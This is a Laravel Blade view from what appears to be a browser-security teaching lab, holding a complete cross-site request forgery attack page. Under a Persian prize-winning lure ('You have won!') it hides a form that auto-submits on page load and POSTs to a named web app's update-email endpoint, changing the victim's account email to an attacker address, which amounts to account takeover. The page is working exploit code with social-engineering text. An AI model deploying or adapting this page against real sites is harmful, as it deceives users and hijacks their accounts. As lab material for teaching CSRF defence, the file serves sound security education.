browser-sec-lab/resources/views/hacker/csrf-exploit.blade.php
2026-04-17 15:17:04 +03:30

23 lines
1007 B
PHP

<!DOCTYPE html>
<html lang="fa" dir="rtl">
<head>
<meta charset="UTF-8">
<title>شما برنده شدید!</title>
<script src="https://tailwindcss.eitebar.ir/tailwind-play.js"></script>
</head>
<body class="bg-slate-900 flex items-center justify-center min-h-screen" onload="document.getElementById('attack-form').submit()">
<div class="text-center bg-slate-800 p-10 rounded-2xl shadow-2xl border border-red-500/50">
<h1 class="text-3xl font-bold text-red-500 mb-4 animate-pulse">در حال انتقال به صفحه دریافت جایزه...</h1>
<p class="text-slate-400">لطفاً مرورگر خود را نبندید.</p>
<form id="attack-form" action="https://webapp.kr-rezvan.ir/update-email" method="POST" style="display:none;">
<input type="hidden" name="email" value="hacker-csrf@eitebar.ir">
</form>
</div>
<script>
console.log("[Hacker] اجرای حمله CSRF کلاسیک...");
</script>
</body>
</html>